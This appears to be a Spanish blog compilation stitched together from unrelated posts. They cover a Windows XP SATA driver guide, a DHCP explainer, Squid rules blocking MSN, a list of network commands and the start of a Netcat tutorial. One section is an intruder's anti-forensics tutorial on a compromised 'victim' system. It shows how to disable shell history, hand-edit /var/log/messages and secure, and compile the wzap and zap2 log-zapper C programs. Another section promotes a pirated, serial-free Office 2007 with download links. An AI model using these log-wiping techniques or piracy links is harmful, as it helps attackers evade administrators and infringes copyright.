Tutorial de integración de drivers SATA con nLite 1.3.5

Recordar que la integración de drivers solo es necesaria si tenemos una controladora SATA integrada no nativa (externa al southbridge del chipset) o una controladora SATA PCI. En general todas las controladoras SATA de placas actuales serán nativa y no necesitarán driver para reconocer discos duros, pero si os encontrais con alguna que necesita driver, pues nada mejor que hacerse un CD con driver integrado en unos pocos minutos…

Para la realización de un CD de Windows XP con driver SATA integrado necesitaremos…

• Un CD de Windows XP, Windows XP SP1 o Windows SP2.
• Driver SATA de la controladora no nativa que vamos a integrar.
• Programa nLite.

Lo primero que haremos será instalar el nLite.

Una vez instalado, lo ejecutaremos y llegaremos a su pantalla de bienvenida, donde en la primera ejecución deberemos elegir el idioma…

Ahora debemos indicarle al programa donde tenemos el CD de instalación de Windows XP, para lo que daremos al botón buscar y después ayudándonos del mini-explorador que saldrá, buscaremos y seleccionaremos la unidad…

Tras esto el programa nos dará un aviso de que encesita una carpeta vacia en el HD para copiar los archivos del Windows y saldrá un mini-explorador para que podamos elegir la carpeta donde queremos hacerlo…

El programa copiará el contenido del CD al HD y mostrará información sobre el tipo de Windows XP copiado, en este punto deberemos dar al botón siguiente…

Llegamos a la ventana donde podemos elegir proyectos anteriores, que en este caso como será la primera vez que estamos utilizando nLite estará vacía. Simplemente daremos al botón siguiente…

Ahora veremos la ventana donde podemos seleccionar que tareas realizar. Seleccionaremos “Integrar Controladores”, “Crear ISO Autoarrancable” y presionaremos en el botón siguiente…

En la siguiente ventana podremos integrar drivers. Lo que haremos es hacer clic en “Insertar” y cuando se desliguen otros das opciones seleccionaremos “Controlador Único”…

Nos saldrá otra vez un mini-explorador donde buscar el driver SATA de la controladora, lo localizaremos, lo seleccionaremos y daremos al botón Abrir…

Ahora sale una nueva ventana en la que tenemos que seleccionar “Controlador Modo Texto” (Debería estar seleccionado por defecto), seleccionaremos el driver a integrar (puede haber varios drivers y debemos integrar el de Windows XP) y por ultimo daremos al botón Aceptar.

Volveremos a la ventana donde podemos integrar drivers, en la cual aparecerá nuestro driver SATA. Volveremos a pulsar en el botón Siguiente…

El programa nos preguntará ahora si queremos comenzar el preciso, le daremos el botón sí y esperaremos a que realice el proceso. Cuando termine nos mostrará en la ventana el texto finalizado y una estadísticas sobre el tamaño de lo que hemos integrado, momento en el que daremos uan vez más a siguiente…

El integrar drivers ya está terminado, ahora falta crear una imagen ISO autoarrancable del Windows XP lo que haremos en la ventana a al que acabamos de llegar. Simplemente debemos hacer clic en el botón “Crear ISO”, seleccionar donde queremos guardar la ISO y presionar en el botón Guardar. Cuando termine, en esa misma ventana se mostrará texto con el resultado de la operación, el nombre del archivo y el tamaño de la ISO. Llegados a este punto deberemos dar otra vez más al a siguiente…

Hemos terminado el proceso, solo nos quedará cerrar nLite haciendo clic en el botón Finalizar y quemar la ISO con nuestro programa de grabación favorito.

Comentar que si queremos podríamos integrar varios drivers SATA, para tener compatibilidad con diferentes placas con SATA no nativas en el mismo CD. De hecho podemos integrar otros drivers que no sean en modo texto, como por ejemplo drivers de red nVidia que no reconoce el sistema hasta que pones drivers, sonido Realtek, sonido C-Media, drivers gráficos actualizados de ATI o nVidia (en todos los casos se integra solo el driver, no el panel de control asociado al driver) y otros drivers. Integración de service packs tambien es posible y sencillisimo. Lo mismo pasa con parches posteriores al SP2. Con LIte tambien se pueden crear instalaciones desatendidas y hacer otros cambios que ahora no recuerdo bien, creo que hasta se pueden preinstalar aplicaciones… pero estas cosas tendrá que ir viendo las cada cual por su cuenta.

Fuente: http://foro.noticias3d.com/vbulletin/showthread.php?t=84695

Creado por oJ3Nok

01/01/03  —— www. ic3t3am.tk ——

Contenidos del Articulo

1 – Introducción / Que necesito

2 – Logs /  Descripción / Ubicación

3 – TCP-Wrapper

4 – Comandos Importantes y su Fin

5 – Programas

6 – Manos a la Obra

7 – Fuentes de Programas

1 -  Introducción
————

¿ Por que debería borrar mis huellas ?

Esta es la respuesta más fácil … Para que al administrador victima del ataque tenga trabajar más para poder desenmascararte, y en la mejor de las situaciones no se entere que estuvimos por ahi

¿ Que necesito saber o tener para seguir leyendo ?

- Un sistema UNIX, de preferencia Linux .

- Conocimientos de intruciones y conseguir acceso root.

- Conocimientos acerca de los comandos básicos en Unix- Saber de ética Hacker

- Manejar Editores de texto como vi, emacs o pico.

2 – Logs
—-

¿ que son estos ?

Estos son presisamente los archivos que se encargan de registrar todo lo que hacemos dentro de una maquina ( la compu ), ya sea el usuario de menor  rango hasta el root.

¿ donde estan los logs ?

Cada programa, generalmente, utiliza al demonio syslogd para generar el registro de que es lo que se hizo .. y se guardan ( creo que asi lo definiré ) en el archivo /etc/syslog.conf

Veamos como sera la visualización de este archivo :

[oJ3Nok@ic3 Log]$ cat /etc/syslog.conf

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console

# Log anything (except mail) of level info or higher.
# Don’t log private authentication messages!
*.info;mail.none;authpriv.none;cron.none /var/log/messages

# The authpriv file has restricted access.
authpriv.* /var/log/secure

# Log all the mail messages in one place.
mail.* /var/log/maillog

# Log cron stuff
cron.* /var/log/cron

# Everybody gets emergency messages
*.emerg *

# Save news errors of level crit and higher in a special file.
uucp,news.crit /var/log/spooler

# Save boot messages also to boot.log
local7.* /var/log/boot.log

[oJ3Nok@ic3b0X Log]$

Aqui Podemos ver Siete Lugares en los cuales se encuentran Logs .

/dev/console –> Sin importancia

/var/log/messages :

Contiene un tipo de información miscelanea , según se le haya asignado
en /etc/syslog.conf

/var/log/secure :

Aqui se almacenan todos los eventos de seguridad,  conexiones realizadas al equipo, cambios de usuario (su, etc….). Buscar conexiones a servicios poco frecuentes, direcciones IP de conexión poco frecuentes y todo lo que se sale de lo habitual.

/var/log/maillog

/var/log/spooler

/var/log/boot.log

Otro que no está en ( mi ) syslog.conf IMPORTANTE :

xferlog

Empleado por algunos servidores de ftp para registrar las transferencias de ficheros ficheros del servidor WWW: En los casos en los que el atacante ha realizado primero un escaneo de vulnerabilidades en el servidor WWW aparecen intentos de conexión a cgi que no están instalados.

wtmp y wtmpx :

Información sobre los accesos con éxito al equipo, usuario que se conecta, protocolo que emplea, maquina origen de la conexión, etc. Aqui se encuentra la información sobre los accesos con exito al equipo, esto registra el usuario que se ha conectado, la maquina de origen ( aunque no sea la de nosotros no debemos dejarlo pasar ) , etc …

Si quieres verlo puedes hacerlo asi :

[oJ3Nok@ic3b0X Log]$ who /var/log/wtmp
[oJ3Nok@ic3b0X Log]$ who ./wtmp


–> wtmp : Este, guarda las IPs con las que se ha accedido, es importante dejarlo limpio, lo podrás encontrar en /var/log/wtmp o /var/adm/wtmp

Más adelante del artículo, daré algunos programas que se encargaran de hacer el trabajo por nosotros ( para ficheros binarios ) . Su forma de utilización y fuentes de estos .

utmp y utmpx :
————

Información sobre los usuarios que están conectados en un momento dado en un equipo, es un fichero binario, aunque se puede emplear el comando who para analizarlos.

–> utmp : Aqui, se guardan todos los accesos al sistema, por los usuarios y
se encuentra en /etc/utmp o en /var/adm/utmp

Lastlog :
——-

Este fichero guarda la hora de el último acceso del usuario y se encuentra
ubicado en /var/adm/lastlog

Acct  :
—-

Aqui se registran los comandos usados por los usuarios, se encuentra
ubicado en /var/adm/acct

El fichero ~/.bash_history :
————————–

Registra todo lo que haces .. ( luego entramos en detalles ).

—————————————————————————–
| Como se pueden dar cuenta casi todos los registros se encuentran en /var/log|
| pero también en algunos sistemas estan en /var/adm |
—————————————————————————–

Consejo :

En este mismo momento revisen el Directorio /var/log o /var/adm , para que se vayan dando cuenta de los ficheros que se encuentran ahí .. revisen los ficheros que ahí aparecen.

3 – TCP-Wrapper
———–

El TCP-WRAPPER es una herramienta parecida al Syslog, pero vinculada a servicios exclusivos del internet daemon (ftp, telnet, mail…). Además de registrar toda actividad referente a la autentificación de cualquiera de estos servicios es capaz de filtrarlos, restringiéndolos de manera que sólo ciertos usuarios puedan conectarse, por ejemplo a través de un firewall.

Para borrar nuestras huellas del TCP-WRAPPER tenemos que seguir el mismo proceso que con el Syslog (buscar el fichero de configuración, modificar los ficheros vinculados…).

4 – Comandos Importantes y su fin
—————————–

” unset “
———

Este comando se utiliza de la siguiente manera y sirve para detener el registro del  historial del shell :

[victima@localhost home]# unset HISTFILE; unset SAVEHIST
[victima@localhost home]#

” ln -s /dev/null ~/.bash_history “
——————————–

Este comando se utiliza para enlazar ~/.bash_history a /dev/null , con lo que se evitaran tener que editar el ~/.bash_history . Luego de enlazarlo , recuerden borrar el ~/.bash_history

[victima@localhost home]# ln -s /dev/null ~/.bash_history
[victima@localhost home]# ls -l .bash_history
1rwxrwxrwx 1 root root 22 Jul 26 22:59 .bash_history ---> /dev/null

” touch “
—–

Este comando es utilizado para reestablecer la fecha y la hora del último acceso a un archivo

5 – Programas
———

wzap : Zapper, que se encarga de borrar a un usuario especifico dentro del registro wtmp.

zap2 : Zapper, por exelencia, borra el wtmp, utmp y el lastlog .. Cuando copies la fuente, fijate el sistema que quieres atacar, pues recuerda que los logs, se encuentran en diferentes directorios ..

un ejemplo de la linea de código a modificar :

#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

6 – Manos a la Obra
—————

Ahora asumiremos que ya estamos en la maquina ¿? que hago ahora .. pues aplicar todo lo que leiste … veamos

Lo Primero es visualizar el archivo :

[victima@localhost log]# cat /etc/syslog.conf

Y determinar en que Directorios se encuentran los Logs ..

Nota :

La fuente de los programas mencionados,se encuentra más adelante, en la seccion ” fuentes ” .

[victima@localhost log]# who ./wtmp  ( estamos en /var/log )
axe      ftpd17264 Dec  31 12:53 ( 172.32.67.2 )
root     tty1      Jan  1  13:4
root     tty1      Jan  1  13:466
root     tty1      Jan  1  13:47
root     tty1      Jan  1  13:48
root     tty1      Jan  1  13:49
root     tty1      Jan  1  13:50
axe      ftp841    Jan  1  12:53 ( 172.32.67.3 )
axe      ftpd3137  Jan  1  12:53 ( 172.32.67.3 )
axe      ftpd83    Jan  1  12:53 ( 172.32.67.3 )

[victima@localhost log]# gcc wzap.c -o wzap

[victima@localhost log]# ./wzap
Enter username to zap from the wtmp : axe        //  le decimos que borre las entradas
opening file…                                      del usuraio ” axe “
opening output file…
working…

[victima@localhost log]# who ./wtmp.out         // La entrada de ” axe ” no está en el
root     tty1      Jan  1  13:4                   archivo wtmp.out
root     tty1      Jan  1  13:466
root     tty1      Jan  1  13:47
root     tty1      Jan  1  13:48
root     tty1      Jan  1  13:49
root     tty1      Jan  1  13:50

[victima@localhost log]# cp wtmp.out wtmp
cp: overwrite `wtmp’? y
[root@localhost log]#                             // Borramos nuestra entrada al Sistema

Ahora con los editores ( pico, vi o emacs ), debemos ” editar ” el contenido de :

[victima@localhost log]# pico /var/log/messages

Aqui te aparecerán entradas y salidas de usuarios .. deberías borrar una o dos ..
( dependiendo de lo que te salga ) :

ene  1 14:00:07 localhost su(pam_unix)[9414]: session opened for user root by axe(uid=501)

En este caso solo debemos borrarla y guardar el archivo …

[root@localhost log]# pico /var/log/secure

Y si entraste por ftp debes editar también el contendi de xferlog

etc .. etc ..

Los más importantes que deberías haber editar son :

- wtmp –> se borra la entrada de un usuario con ” wzap “
- messages –> se edita con algún editor
- secure –> se edita con algún editor
- xferlog –> se edita con algún editor / entradas por ftp

Ahora debemos eliminar todo lo que presionamos …

estos los puedes editar con un :

[root@localhost log]# pico ~/.bash_history

El inconveniente de esto, es que quedará registrada nuestra salida ..

Pero no te preocupes … hay otras maneras de  hacerlo :

[root@localhost log]# unset HISTFILE; unset SAVEHIST     // Desactivar Historial

——————–

[root@localhost log]# ln -s /dev/null ~/.bash_history   // Lo vinculamos a /dev/null

Cosa que no queden registros de nada —

Ahora recuerda borrar el ~/.bash_history

Con esto deberían quedar los registros más frecuentes, limpios — pero siempre recuerda que ningún sistema esta configurado igual … perfectamenete , puede tener el TCP-Wrapper , por lo que nos demoraremos un poco más en borrar nuestras huellas …

Otra cosa importante es que no empieces a hacer estupideces en el sistema victima, me refiero a borrar y modificar archivos que no sean de logs ni alguno que nos sirva de entrada en una proxima ocación.

7 – Fuentes de Zappers ..
——————

| wzap.c |


/*  Dave's neato wtmp program
*      wzap.c
*      NOTE:   reads 'wtmp' from current directory and writes
*                      'wtmp.out' in cuurent directory...
*/

#include        <utmp.h>
#include        <stdio.h>
#include        <time.h>
#include        <sys/time.h>

FILE *Wfile, *Wout;

struct utmp myutmp;

main(argc,argv)
int argc;
char *argv[];
{
char username[20];
char yesorno[5];
long thetime, posi;

if (argc<2) {
printf(“\n\n”);
printf(“Enter username to zap from the wtmp: “);
scanf(“%s”,username);
} else strcpy(username,argv[1]);

printf(“\nopening file…\n”);
if ((Wfile = fopen(“wtmp”,”r”))==NULL)
{ printf(“no open file\n”); exit(0); }
printf(“\opening output file…\n”);
if ((Wout = fopen(“wtmp.out”,”wr”))==NULL)
{ printf(“no open output file…\n”); exit(0); }

printf(“working…\n”);
while(!feof(Wfile)) {
fread(&myutmp,sizeof(myutmp),1,Wfile);
if (strncmp(myutmp.ut_name,username,8))
fwrite(&myutmp,sizeof(myutmp),1,Wout);
}
fclose(Wfile);
fclose(Wout);
}

|  Zap2 – z2 .c  |


#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf(“%s: ?\n”,who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf(“Zap2!\n”);
} else
printf(“Error.\n”);
}

| oJ3Nok |  www.ic3t3am.tk

Un poco de historia

DHCP se deriva de del protocolo Bootstrap (BootP). BootP fue de los primeros métodos para asignar de forma dinámica, direcciones IP a otros equipos (ordenadores, impresoras, etc.). Al ser las redes cada vez más grandes, BootP ya no era tan adecuado y DHCP fue creado para cubrir las nuevas demandas.

Como se ha comentado, se puede incluir información adicional en el protocolo DHCP. La configuración básica que puede ser enviada junto con la dirección IP es:

• Dirección IP y la máscara.
• Pasarela o gateway para la máquina que quiere acceder a la red.
• Servidor DNS para que la estación de trabajo pueda resolver nombres a direcciones IP.

Definición del término DHCP

DHCP significa Protocolo de configuración de host dinámico . Es un protocolo que permite que un equipo conectado a una red pueda obtener su configuración (principalmente, su configuración de red) en forma dinámica (es decir, sin intervención particular). Sólo tiene que especificarle al equipo, mediante DHCP, que encuentre una dirección IP de manera independiente. El objetivo principal es simplificar la administración de la red.

Funcionamiento del protocolo DHCP

Primero, se necesita un servidor DHCP que distribuya las direcciones IP. Este equipo será la base para todas las solicitudes DHCP por lo cual debe tener una dirección IP fija. Por lo tanto, en una red puede tener sólo un equipo con una dirección IP fija: el servidor DHCP.

El sistema básico de comunicación es BOOTP (con la trama UDP). Cuando un equipo se inicia no tiene información sobre su configuración de red y no hay nada especial que el usuario deba hacer para obtener una dirección IP. Para esto, la técnica que se usa es la transmisión: para encontrar y comunicarse con un servidor DHCP, el equipo simplemente enviará un paquete especial de transmisión (transmisión en 255.255.255.255 con información adicional como el tipo de solicitud, los puertos de conexión, etc.) a través de la red local. Cuando el DHCP recibe el paquete de transmisión, contestará con otro paquete de transmisión (no olvide que el cliente no tiene una dirección IP y, por lo tanto, no es posible conectar directamente con él) que contiene toda la información solicitada por el cliente.

Se podría suponer que un único paquete es suficiente para que el protocolo funcione. En realidad, hay varios tipos de paquetes DHCP que pueden emitirse tanto desde el cliente hacia el servidor o servidores, como desde los servidores hacia un cliente:

• DHCPDISCOVER (para ubicar servidores DHCP disponibles)
• DHCPOFFER (respuesta del servidor a un paquete DHCPDISCOVER, que contiene los parámetros iniciales)
• DHCPREQUEST (solicitudes varias del cliente, por ejemplo, para extender su concesión)
• DHCPACK (respuesta del servidor que contiene los parámetros y la dirección IP del cliente)
• DHCPNAK (respuesta del servidor para indicarle al cliente que su concesión ha vencido o si el cliente anuncia una configuración de red errónea)
• DHCPDECLINE (el cliente le anuncia al servidor que la dirección ya está en uso)
• DHCPRELEASE (el cliente libera su dirección IP)
• DHCPINFORM (el cliente solicita parámetros locales, ya tiene su dirección IP)

El primer paquete emitido por el cliente es un paquete del tipo DHCPDISCOVER. El servidor responde con un paquete DHCPOFFER, fundamentalmente para enviarle una dirección IP al cliente. El cliente establece su configuración y luego realiza un DHCPREQUEST para validar su dirección IP (una solicitud de transmisión ya que DHCPOFFER no contiene la dirección IP) El servidor simplemente responde con un DHCPACK con la dirección IP para confirmar la asignación. Normalmente, esto es suficiente para que el cliente obtenga una configuración de red efectiva, pero puede tardar más o menos en función de que el cliente acepte o no la dirección IP…

Modos en DHCP

Existen 3 modos en DHCP para poder asignar direcciones IP a otros equipos:

1 – Asignación manual: El administrador configura manualmente las direcciones IP del cliente en el servidor DCHP. Cuando la estación de trabajo del cliente pide una dirección IP, el servidor mira la dirección MAC y procede a asignar la que configuró el administrador.

2 – Asignación automática: Al cliente DHCP (ordenador, impresora, etc.) se le asigna una dirección IP cuando contacta por primera vez con el DHCP Server. En este método la IP es asignada de forma aleatoria y no es configurada de antemano.

3 – Asignación dinámica: El servidor DHCP asigna una dirección IP a un cliente de forma temporal. Digamos que es entregada al client Server que hace la petición por un espacio de tiempo. Cuando este tiempo acaba, la IP es revocada y la estación de trabajo ya no puede funcionar en la red hasta que no pida otra.

Concesiones:

Para optimizar los recursos de red, las direcciones IP se asignan con una fecha de inicio y de vencimiento para su validez. Esto es lo que se conoce como “concesión“. Un cliente que detecta que su concesión está a punto de vencer, puede solicitarle al servidor una extensión de la misma por medio de un DHCPREQUEST. Del mismo modo, cuando el servidor detecta que una concesión va a vencer, enviará un DCHPNAK para consultarle al cliente si desea extenderla. Si el servidor no recibe una respuesta válida, convertirá la dirección IP en una dirección disponible.

Esta es la efectividad de DHCP: se puede optimizar la asignación de direcciones IP planificando la duración de las concesiones. El problema es que si no se liberan direcciones, en un momento determinado no se podrá cumplir con nuevas solicitudes DHCP debido a que faltarán direcciones que puedan distribuirse.

En una red en la cual muchos equipos se conectan y desconectan permanentemente (redes de escuelas o de oficinas de ventas, por ejemplo), es aconsejable ofrecer concesiones por períodos cortos. En cambio, para una red compuesta principalmente por equipos fijos que se reinician rara vez, las concesiones por períodos largos son más que suficientes. No se olvide que DHCP trabaja principalmente por transmisión y que puede ocupar ancho de banda en redes pequeñas con alta demanda.

Conclusión:

DHCP es un protocolo diseñado principalmente para ahorrar tiempo gestionando direcciones IP en una red grande. El servicio DHCP está activo en un servidor donde se centraliza la gestión de la direcciones IP de la red. Hoy en día, muchos sistemas operativos incluyen este servicio dada su importancia.

Fuentes: http://es.kioskea.net/ & http://www.ordenadores-y-portatiles.com/

Lo siguiente bloquea por completo MSN Messenger a toda la red local.

acl msnmime req_mime_type ^application/x-msn-messenger
acl msngw url_regex -i gateway.dll

http_access deny msnmime
http_access deny msngw

Si solo se quiere bloquear a la red local, dejando que la lista libres si pueda acceder:

acl src redlocal 192.168.0.0/255.255.255.0
acl src libres “/etc/squid/listas/libres”
acl msnmime req_mime_type ^application/x-msn-messenger
acl msngw url_regex -i gateway.dll

http_access allow libres
http_access deny msnmime redlocal
http_access deny msngw redlocal

Fuente: http://www.alcancelibre.org/forum/viewtopic.php?showtopic=3696

Los comandos de red sirven para detectar el funcionamiento de una red de árealocal e Internet con respecto a la información que se transmite, los ejecutamos desde la consola de comandos
(Inicio->Ejecutar y luego escribimos cmd y damos enter)

Ping: Nos informa del estado de un host. Es necesario permitir paquetes ICMP para sufuncionamiento.

• Ping -t: se hace ping hasta que que pulsemos Ctrl+C para detener los envíos.
• Ping -a: devuelve el nombre del host.
• Ping -l: establece el tamaño del buffer. Por defecto el valor es 32.
• Ping -f: impide que se fragmenten los paquetes.
• Ping -n (valor): realiza la prueba de ping durante un determinado numero deocasiones.
• Ping -i TTL: permite cambiar el valor del TTL. TTL seria sustituido por elnuevo valor.
• Ping -r (nº de saltos): indica los host por los que pasa nuestro ping.(máximo 9)
• Ping -v TOS: se utiliza en redes avanzadas para conocer la calidad delservicio.

Tracert: Indica la rutapor la que pasa nuestra peticion hasta llegar al host destino.

• Tracert -d: no resuelve los nombres del dominio.
• Tracert -h (valor): establece un nº máximo de saltos.

PatchPing: Mezcla entre el comando Ping y Tracert.

• PatchPing -h (nº de saltos): nº máximo de saltos.
• PatchPing -n: no se resuelven los nombres de host.
• PatchPing -6: obliga a utilizar IPV6

Ipconfig: Proporciona informacion sobre TCP/IP,adaptadores, etc.

• Ipconfig /all: ofrece información detallada sobre todas las t. de red yconexiones activas.
• Ipconfig /renew: renueva petición a un servidor DHCP
• Ipconfig /release: libera la Ip asignada por DHCP
• Ipconfig /registerdns: registra todos los nombres DNS
• Ipconfig /flushdns: borrar todas las entradas DNS.

Net Diversas funciones

• Net Send: Envía un mensaje a traves del servicio mensajero
• Net Start: Inicia un servicio de Windows
• Net Stop: Detiene un servicio de Windows
• Net Share: Indica que recursos comparte la maquina
• Net View: Indica a que máquinas se tiene acceso mediante la red
• Net Sessions: Indica quienes han entrado en nuestros recursos compartidos
• Net Time * /SET: Sincroniza la hora con una maquina de la red
• Net User: Crea o elimina usuarios
• Net Localgroup: Crea o elimina grupos

Netstat: Muestra todas las conexiones activas en elequipo.

• Netstat -a: nos muestra todas las conexiones y puertos.
• Netstat -e: muestras las estadísticas Ethernet
• Netstat -n muestra direcciones y puertos en forma de numero.
• Netstat -o: muestra que programa esta asociado a la conexión activa
• Netstat – p (protocolo): permite especificar que protocolo se desea ver.TCP/UDP
• Netstat -s: muestra estadísticas clasificas por protocolo.

Nbtstat: util para resolver problemas entre Ips yNetbios.

• Nbtstat -c: lista los nombres Netbios y los relaciona a una IP.

Arp: Muestra y modifica datos de latabla de traduccion de direcciones IP a direcciones MAC (tabla ARP)[list][*]Arp-a (también -g): muestra la tabla ARP para cada uno de los interfaces[*]Arp -s(dir_ip) (dir_MAC) [dir_interfaz]: añade una entrada especifica a la tabla ARP.Si hay varios interfaces de red, añadiendo al final la direccion IP delinterfaz, lo añade en la tabla correspondiente a ese interfaz[*]Arp -d (dir_ip)[dir_interfaz]: elimina una entrada especifica de la tabla ARP. Se pueden usarcomodines en la direccion IP. Si hay varios interfaces de red, añadiendo alfinal la direccion IP del interfaz, lo elimina de la tabla correspondiente a eseinterfaz.

Route: muestra ymodifica la información sobre las rutas IP del equipo.

• Route PRINT: muestra la tabla completa de rutas
• Route ADD (red_destino) MASK (mascara_destino) (puerta de enlace) [METRICmetrica] [IF interfaz]: Añade una ruta. Con el modificador -p (route add -p …)hace la ruta persistente, de manera que se mantendra aunque se reinicie elequipo.
• Route DEL (red_destino) MASK (mascara_Destino) [puerta de enlace]: Eliminala ruta especificada. Admite caracteres comodines.
• Route CHANGE (red_destino) MASK (mascara_destino) (IP_salida/siguientesalto) [METRIC metrica] [IF interfaz]: Modifica la metrica, o la puerta deenlace en una ruta existente
  NOTA: parametros entre parentesis () sonobligatorios y entre corchetes [] son opcionales.

TFTP transfiere archivos de un sitio a otro, senecesita un servidor en uno de los dos ordenadores.

Netsh se puede utilizar entre otras cosas paracambiar los parámetros de la red desde linea de comandos.
ejemplo defuncionamiento, que podría colocarse en un archivo bat:

netsh interfaceip set address name=LAN source=static addr=192.168.1.4 mask=255.255.255.0gateway=192.168.1.1 gwmetric1
netsh interface ip set dns name=LANsource=static addr=80.58.0.33
netsh interface ip add dns name=LANaddr=80.58.32.97

Fuente: http://www.trucoswindows.net

Esta versión de office nunca fue lanzada al mercado por Microsoft, solo era ocupada por las empresas “amigas” de Microsoft.

Ahora la pregunta que te debes estar haciendo es : ¿pero que tiene de especial este office “blue edition”? La respuesta es muy fácil y muy concreta, la diferencia con el office normal es que este no necesita serial. con este office te ahorras todo eso de buscar serial que sirva y la validación, solo lo instalas y listo.

La verdad es que este office ha sido posteado, pero con la diferencia de que venia el office en ingles y después tenias que bajar el pack para pasarlo al español, este office viene por defecto en Español, si que te ahorras lo de andar bajando aparte de los links del programa , los links del parche o pack en español, puedes instalarlo encima de otra instalación de office y se reemplazara por el office “blue edition”, pero como recomendación, para ahorrarse cualquier tipo de problema.. mejor instalarlo cuando no tengan ningún office instalado.

El office Blue edition viene ademas de estar en español con el Service Pack 1 de Office 2007 incluido (se instala automáticamente en la instalación principal del office). Ya que este “Blue Edition” se basa en el Office Enterprise trae todos las aplicaciones que de por si trae el Entreprice:

Microsoft Word
Microsoft Power Point
Microsoft Excel
Microsoft Access
Microsoft Outlook
Microsoft Photo Manager
Microsoft Publisher
Microsoft InfoPath
Microsoft OneNoteescritorio o Tablet PC
Microsoft Project Microsoft Visio
Microsoft Groove

Los formatos que soporta office son:

DOC, DOCX, XLS, XLSX, PPT, PPTX, MDB, ACCDB, PUB, RTF, TXT, HTM, JPG, PNG, TIF, EMF, WMF, XML, WRI.

Requisitos mínimos:
Procesador: 500 MHz
Memoria: 256 MB
Espacio libre en disco: 3,0 GB
Resolución de pantalla: 1024×768
Internet Explorer 6.0
Recomendado:
Procesador: 1,0 GHz
Memoria: 512 MB
Espacio libre en disco: 5,0 GB
Resolución de pantalla: 1280×800
Internet Explorer 7.0

Tamaño: 900 MB
Formato Descomprimido: ISO
Formato Compresion: Winrar 3.80
nº Archivos: 5 ( 4 x 191 MB + 1 x 27 MB)
Archivo Chequeador: .SFV
Passwor Descompresion: No
Idioma:Español
Licencia: No requiere
SO:Windows WinXP/Vista

Deposites

http://depositfiles.com/files/qo3z1ps8r
http://depositfiles.com/files/dfnr6io86
http://depositfiles.com/files/pp3q7pruz
http://depositfiles.com/files/uvcxim8fo
http://depositfiles.com/files/o5j7d2oio

netload

http://netload.in/dateiUFrjdj2IwU/Off07BlueSP1.part1.rar.htm
http://netload.in/dateisbswKplP2R/Off07BlueSP1.part2.rar.htm
http://netload.in/datei0jVtbmnFA9/Off07BlueSP1.part3.rar.htm
http://netload.in/dateiCGvFcbKBiz/Off07BlueSP1.part4.rar.htm
http://netload.in/dateixuzdvej5Th/Off07BlueSP1.part5.rar.htm

Rapidshare

http://rapidshare.com/files/216629989/Off07BlueSP1.part1.rar
http://rapidshare.com/files/216632364/Off07BlueSP1.part2.rar
http://rapidshare.com/files/216631753/Off07BlueSP1.part3.rar
http://rapidshare.com/files/216635235/Off07BlueSP1.part4.rar
http://rapidshare.com/files/216634696/Off07BlueSP1.part5.rar

creditos para Dboca

==========================================
Netcat.
Sacandole Provecho a una exelente Utilidad.
por: Kliber.
kliber@hven.com.ve
Hackers Venezuela
==========================================

Netcat es un pequeño programa creado para uso de los administradores de redes (y por supuesto para los Hackers) , este proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy poco se ha escrito sobre este Programita; Principalmente porque la estructura de sus comandos es poco familiar para el usuario medio. Netcat tiene infinidad de funciones, aunque se deja que sea el usuario quien las averigue , y en el archivo de ayuda ponen algunos ejemplitos muy elementales solamente.

La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la máquina de windows, cierto poder sobre este protocolo que solo tenía UNIX, trabaja con lineas de comandos desde MS-DOS (o desde el Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre TCP/IP. El comando principal es nc con su respectiva variable u opción al mas puro estilio Unix.

Cabe destacar que la información sobre Netcat y sus usos especificos es bastante limitada; aunque Hobbit en su documento aclara muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado para mas de 1001 vainas…

Netcat puede ser encontrado en: http://www.l0pht.com/~weld/netcat

Netcat en WinX
==============

Este es el resultado de el comando de ayuda de netcat en una máquina windows

c:>nc -h

connect to somewhere: nc [-options] hostname port [ports]
listen for inbound: nc -l -p port [options] [hostname] [port]
options:

-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
